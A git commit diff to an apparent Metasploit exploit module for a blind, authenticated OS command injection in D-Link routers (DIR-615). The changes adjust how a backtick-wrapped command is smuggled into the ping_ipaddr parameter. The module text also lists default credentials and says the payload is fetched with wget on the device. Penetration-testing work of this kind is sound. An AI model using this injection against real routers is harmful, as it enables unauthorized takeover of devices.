feeback included

unstable
m-1-k-3 2013-05-19 16:19:45 +02:00
parent 981cc891bc
commit 4816925f83
1 changed files with 3 additions and 4 deletions

View File

@ -22,7 +22,8 @@ class Metasploit3 < Msf::Exploit::Remote
Some D-Link Routers are vulnerable to an authenticated OS command injection. Some D-Link Routers are vulnerable to an authenticated OS command injection.
Default credentials for the web interface are admin/admin or admin/password. Since Default credentials for the web interface are admin/admin or admin/password. Since
it is a blind os command injection vulnerability, there is no output for the it is a blind os command injection vulnerability, there is no output for the
executed command when using the cmd generic payload. A ping command against a executed command when using the cmd generic payload. This module was tested against
a DIR-615 hardware revision H1 - firmware version 8.04. A ping command against a
controlled system could be used for testing purposes. The exploit uses the wget controlled system could be used for testing purposes. The exploit uses the wget
client from the device to download the payload. client from the device to download the payload.
}, },
@ -77,17 +78,15 @@ class Metasploit3 < Msf::Exploit::Remote
def request(cmd,user,pass) def request(cmd,user,pass)
#http://IP/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr= #http://IP/tools_vct.htm?page=tools_vct&hping=0&ping_ipaddr=1.1.1.1%60COMMAND%60&ping6_ipaddr=
cmd = Rex::Text.uri_encode(cmd)
begin begin
res = send_request_cgi({ res = send_request_cgi({
'uri' => @uri, 'uri' => @uri,
'method' => 'GET', 'method' => 'GET',
'encode_params' => false,
'vars_get' => { 'vars_get' => {
"page" => "tools_vct", "page" => "tools_vct",
"hping" => "0", "hping" => "0",
"ping_ipaddr" => "1.1.1.1%60#{cmd}%60", "ping_ipaddr" => "1.1.1.1`#{cmd}`",
"ping6_ipaddr" => "" "ping6_ipaddr" => ""
} }
}) })